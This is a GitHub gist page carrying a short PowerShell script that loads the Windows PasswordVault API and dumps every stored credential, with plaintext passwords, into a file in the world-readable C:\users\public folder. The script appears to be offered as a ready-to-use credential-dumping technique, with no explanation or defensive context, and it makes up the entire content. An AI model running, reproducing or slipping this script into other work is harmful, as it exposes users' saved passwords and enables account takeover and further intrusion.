Skip to content

Instantly share code, notes, and snippets.

@K-Mistele
Created June 23, 2021 21:22
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save K-Mistele/430fc0a6b9b9fe3d5f38ac1b7c681d34 to your computer and use it in GitHub Desktop.
Save K-Mistele/430fc0a6b9b9fe3d5f38ac1b7c681d34 to your computer and use it in GitHub Desktop.
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() |% {$_.RetrievePasswords();$_} | Out-File C:\users\public\output.dmp
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment